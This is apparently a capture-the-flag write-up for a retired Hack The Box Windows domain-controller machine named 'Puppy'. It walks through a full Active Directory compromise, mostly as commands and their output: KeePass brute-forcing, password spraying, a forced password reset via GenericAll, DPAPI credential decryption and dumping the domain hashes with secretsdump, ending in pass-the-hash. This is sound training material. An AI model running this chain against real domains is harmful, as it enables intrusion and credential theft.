Puppy Machine Info
OS	Windows
Difficulty	Medium
Status	Retired
Stars	4.8/5.0
Released	2025-05-17
Owns	User: 6,509 Root: 5,974
Times	User: 1H 25M 26S Root: 1H 40M 15S
My Rank	68

Enum

$ rustscan --ulimit 10000 -a 10.129.222.139 -- -sCTV -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-`
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn`t hacking.
 
[~] Automatically increasing ulimit value to 10000.
Open 10.129.222.139:53
Open 10.129.222.139:88
Open 10.129.222.139:111
Open 10.129.222.139:135
Open 10.129.222.139:139
Open 10.129.222.139:389
Open 10.129.222.139:445
Open 10.129.222.139:464
Open 10.129.222.139:593
Open 10.129.222.139:636
Open 10.129.222.139:3260
Open 10.129.222.139:3268
Open 10.129.222.139:3269
Open 10.129.222.139:5985
Open 10.129.222.139:9389
Open 10.129.222.139:49664
Open 10.129.222.139:49667
Open 10.129.222.139:49669
Open 10.129.222.139:49670
Open 10.129.222.139:49685
Open 10.129.222.139:52113
Open 10.129.222.139:52128
 
*snip*
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-05-18 15:42:44Z)
111/tcp   open  rpcbind?      syn-ack
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
2049/tcp  open  rpcbind       syn-ack
3260/tcp  open  iscsi?        syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         syn-ack Microsoft Windows RPC
52113/tcp open  msrpc         syn-ack Microsoft Windows RPC
52128/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: 7h00m26s

puppy.htb $\to$ /etc/hosts

Fix time skew

$ sudo ntpdate puppy.htb
CLOCK: time stepped by 25226.715086

We see SMB port open $\to$ check our provided credentials

$ crackmapexec smb 10.129.222.139 -u levi.james -p 'KingofAkron2025!' --shares
 
SMB         10.129.222.139   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.222.139   445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB         10.129.222.139   445    DC               [+] Enumerated shares
SMB         10.129.222.139   445    DC               Share           Permissions     Remark
SMB         10.129.222.139   445    DC               -----           -----------     ------
SMB         10.129.222.139   445    DC               ADMIN$                          Remote Admin
SMB         10.129.222.139   445    DC               C$                              Default share
SMB         10.129.222.139   445    DC               DEV                             DEV-SHARE for PUPPY-DEVS
SMB         10.129.222.139   445    DC               IPC$            READ            Remote IPC
SMB         10.129.222.139   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.222.139   445    DC               SYSVOL          READ            Logon server share

Nothing useful + we do not have read access in /DEV which seems interesting

$ smbclient -U "PUPPY.HTB\\levi.james" //10.129.222.139/DEV
 
Password for [PUPPY.HTB\levi.james]: 'KingofAkron2025!'
Try "help" to get a list of possible commands.
 
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Release the hounds for more information (netexec works pretty well)

$ nxc ldap puppy.htb -u levi.james -p 'KingofAkron2025!' --bloodhound --collection All --dns-server 10.129.222.139
 
SMB         10.129.222.139   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
LDAP        10.129.222.139   389    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025!
LDAP        10.129.222.139   389    DC               Resolved collection methods: trusts, container, rdp, localadmin, dcom, group, session, psremote, acl, objectprops
LDAP        10.129.222.139   389    DC               Done in 00M 10S
LDAP        10.129.222.139   389    DC               Compressing output into /home/nerd/.nxc/logs/DC_10.129.222.139_*_bloodhound.zip
 
$ mv /path/to/*.zip hound.zip

Load into Bloodhound

Add Levi to Developer group and access /DEV

$ bloodyAD -d puppy.htb -u levi.james -p 'KingofAkron2025!' --host puppy.htb add groupMember Developers levi.james
 
[+] levi.james added to DEVELOPERS
 
$ smbclient //puppy.htb/DEV -U levi.james 'KingofAkron2025!'
 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025
 
		5080575 blocks of size 4096. 1514716 blocks available
 
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (13.6 KiloBytes/sec) (average 13.6 KiloBytes/sec)

User

Keepass file we can attempt to open, but needs password

We do not know the pass, need to crack. keepass2john is outdated but can find Keepass4brute

$ curl -L -o keepass4brute.sh https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2820  100  2820    0     0  28635      0 --:--:-- --:--:-- --:--:-- 28775
 
$ chmod +x keepass4brute.sh
$ ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
 
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
 
[+] Words tested: 36/14344392 - Attempts per minute: 154 - Estimated time remaining: 9 weeks, 1 days
[+] Current attempt: liverpool
 
[*] Password found: liverpool
 
$ keepassxc recovery.kdbx

PW = liverpool

Extract passwords + create user & pass list based on relevant Bloodhound accounts

$ nano users.txt
 
administrator
ant.edwards
jamie.williams
steph.cooper
steph.cooper_adm
 
$ nano pws.txt
 
HJKL2025!
Antman2025!
JamieLove2025!
ILY2025!
Steve2025!
 
$ crackmapexec smb 10.129.222.139 -u users.txt -p pass.txt --continue-on-success
 
SMB         10.129.222.139  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
 
SMB         10.129.222.139  445    DC               [+] PUPPY.HTB\ant.edwards:Antman2025!
 
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\samuel.blake:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steve.tucker:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB         10.129.222.139  445    DC               [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE

ant.edwards : Antman2025!

Enum this user in Bloodhound to reveals path

dc.puppy.htb $\to$ /etc/hosts

GenericAll over Adam.Silver so lets investigate further for writable properties

First lets check Adam.Silver account details

$ ldapsearch -x -H ldap://puppy.htb -D 'ant.edwards@puppy.htb' -w 'Antman2025!' \
  -b 'DC=puppy,DC=htb' "(sAMAccountName=adam.silver)" userAccountControl
 
# extended LDIF
#
# LDAPv3
# base <DC=puppy,DC=htb> with scope subtree
# filter: (sAMAccountName=adam.silver)
# requesting: userAccountControl
#
 
# Adam D. Silver, Users, PUPPY.HTB
dn: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
userAccountControl: 66050
 
# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB
 
# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB
 
# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB
 
# search result
search: 2
result: 0 Success
 
# numResponses: 5
# numEntries: 1
# numReferences: 3

userAccountControl: 66050

Can we activate the account?

$ bloodyAD --host puppy.htb -d puppy.htb -u ant.edwards -p 'Antman2025!' get writable --detail
 
distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
*snip bc its his account*
 
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
*snip for relevant privesc options*
 
unicodePwd: WRITE
userAccountControl: WRITE

We can activate and change password to a known one

$ bloodyAD --host dc.puppy.htb -d puppy.htb --host dc.puppy.htb -u 'ant.edwards' -p 'Antman2025!' -k remove uac -f ACCOUNTDISABLE adam.silver
 
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver`s userAccountControl
 
$ bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --host puppy.htb set password adam.silver 'asdf1234!'
 
[+] Password changed successfully!

Adam.Silver = CanPSRemote $\to$ evil-winrm

$ evil-winrm -i puppy.htb -u adam.silver -p 'asdf1234!' -d puppy.htb
 
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> ls
 
    Directory: C:\Users\adam.silver\Desktop
 
Mode                 LastWriteTime         Length Name-
-a----         2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---         5/19/2025  10:59 PM             34 user.txt
 
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> cat user.txt

Cleaner script will deactivate account eventually, may have to reconnect.

Root

*Evil-WinRM* PS C:\> ls
 
    Directory: C:\
 
Mode                 LastWriteTime         Length Name-
d-----          5/9/2025  10:48 AM                Backups
d-----         5/12/2025   5:21 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          4/4/2025   3:40 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-----          3/8/2025   9:00 AM                StorageReports
d-r---          3/8/2025   8:52 AM                Users
d-----         5/13/2025   4:40 PM                Windows
 
*Evil-WinRM* PS C:\> ls Backups
 
    Directory: C:\Backups
 
Mode                 LastWriteTime         Length Name-
-a----          3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip
 
*Evil-WinRM* PS C:\> download Backups/site-backup-2024-12-30.zip
 
Info: Downloading C:\\Backups/site-backup-2024-12-30.zip to site-backup-2024-12-30.zip
Info: Download successful!

Enumerate files

$ unzip site-backup-2024-12-30.zip
$ cd puppy
$ cat nms-auth-config.xml.bak
 
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
    <server>
        <host>DC.PUPPY.HTB</host>
        <port>389</port>
        <base-dn>dc=PUPPY,dc=HTB</base-dn>
        <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
        <bind-password>ChefSteph2025!</bind-password>
    </server>
    <user-attributes>
        <attribute name="username" ldap-attribute="uid" />
        <attribute name="firstName" ldap-attribute="givenName" />
        <attribute name="lastName" ldap-attribute="sn" />
        <attribute name="email" ldap-attribute="mail" />
    </user-attributes>
    <group-attributes>
        <attribute name="groupName" ldap-attribute="cn" />
        <attribute name="groupMember" ldap-attribute="member" />
    </group-attributes>
    <search-filter>
        <filter>(&(objectClass=person)(uid=%s))</filter>
    </search-filter>
</ldap-config>

steph.cooper : ChefSteph2025!

Recall there was also a Steph.Cooper_adm account $\to$ DPAPI credentials may exist

*Evil-WinRM* PS C:\Users\steph.cooper\Desktop> upload SharpDPAPI.exe
 
Data: 94208 bytes of 94208 bytes copied
Info: Upload successful!
 
*Evil-WinRM* PS C:\Users\steph.cooper\Desktop> ./SharpDPAPI.exe credentials /target:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.4.0
 
[*] Action: User DPAPI Credential Triage
 
[*] Target Credential Folder: C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
Folder       : C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials
 
  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D
 
    guidMasterKey    : {556a2412-1275-4ccf-b721-e6a0b4f90407}
    size             : 11068
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)
    description      : Local Credential Data
 
    [X] MasterKey GUID not in cache: {556a2412-1275-4ccf-b721-e6a0b4f90407}

Manually extract necessary files for offline decryption (need to trim filenames to download in evil-winrm)

*Evil-WinRM* PS C:\Users\steph.cooper> whoami /user
 
USER INFORMATION
-         ------ ----
-a----          3/8/2025   7:40 AM            740 556a2412-1275-4ccf-b721-e6a0b4f90407
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir -h C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
 
    Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
 
Mode                 LastWriteTime         Length Name-
-a-hs-          3/8/2025   7:54 AM            414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> attrib -h -s "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> download "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"
 
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 to 556a2412-1275-4ccf-b721-e6a0b4f90407
 
Info: Download successful!
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> attrib -h -s 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9'
 
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> download 'C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9'
 
Info: Downloading C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 to C8D69EBE9A43E9DEBF6B5FBD48B521B9
 
Info: Download successful!

Decrypt with impacket dpapi.py

$ dpapi.py masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags       :        0 (0)
Policy      : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
 
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
 
$ dpapi.py credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=PUPPY.HTB
Description :
Unknown     :
Username    : steph.cooper_adm
Unknown     : FivethChipOnItsWay2025!

steph.cooper_adm : FivethChipOnItsWay2025!

$ evil-winrm -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -i puppy.htb
 
*Evil-WinRM* PS C:\Users\steph.cooper_adm\Documents> cat ../../Administrator/Desktop/root.txt
588f40f27753b39d62829f09217b5d39

Can also secretsdump for Admin hash

$ secretsdump.py PUPPY/steph.cooper_adm:'FivethChipOnItsWay2025!'@dc.puppy.htb
 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
 
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn`t have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
 0000   DD 1B A5 A0 33 E7 A0 56  1C 3F C3 F5 86 31 BA 09   ....3..V.?...1..
 0010   1A C4 D4 6A 3C 2A FA 15  26 06 3B 93 E0 66 0F 7A   ...j<*..&.;..f.z
 0020   02 9A C7 2E 52 79 C1 57  D9 0C D3 F6 17 79 EF 3F   ....Ry.W.....y.?
 0030   75 88 A3 99 C7 E0 2B 27  56 95 5C 6B 85 81 D0 ED   u.....+`V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
[*] Cleaning up...
 
$ evil-winrm -i puppy.htb -u Administrator -H bb0edc15e49ceb4120c7bd7e6e65d75b
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
588f40f27753b39d62829f09217b5d39

Home

Explorer

01-Puppy

Enum

puppy.htb $\to$ /etc/hosts

Fix time skew

We see SMB port open $\to$ check our provided credentials

Nothing useful + we do not have read access in /DEV which seems interesting

Release the hounds for more information (netexec works pretty well)

Load into Bloodhound

Add Levi to Developer group and access /DEV

User

Keepass file we can attempt to open, but needs password

We do not know the pass, need to crack. keepass2john is outdated but can find Keepass4brute

PW = liverpool

Extract passwords + create user & pass list based on relevant Bloodhound accounts

ant.edwards : Antman2025!

Enum this user in Bloodhound to reveals path

dc.puppy.htb $\to$ /etc/hosts

GenericAll over Adam.Silver so lets investigate further for writable properties

First lets check Adam.Silver account details

userAccountControl: 66050

Can we activate the account?

We can activate and change password to a known one

Adam.Silver = CanPSRemote $\to$ evil-winrm

Cleaner script will deactivate account eventually, may have to reconnect.

Root

Enumerate files

steph.cooper : ChefSteph2025!

Recall there was also a Steph.Cooper_adm account $\to$ DPAPI credentials may exist

Manually extract necessary files for offline decryption (need to trim filenames to download in evil-winrm)

Decrypt with impacket dpapi.py

steph.cooper_adm : FivethChipOnItsWay2025!

Can also secretsdump for Admin hash

Graph View

Table of Contents

Home

Explorer

01-Puppy

Enum

puppy.htb → /etc/hosts

Fix time skew

We see SMB port open → check our provided credentials

Nothing useful + we do not have read access in /DEV which seems interesting

Release the hounds for more information (netexec works pretty well)

Load into Bloodhound

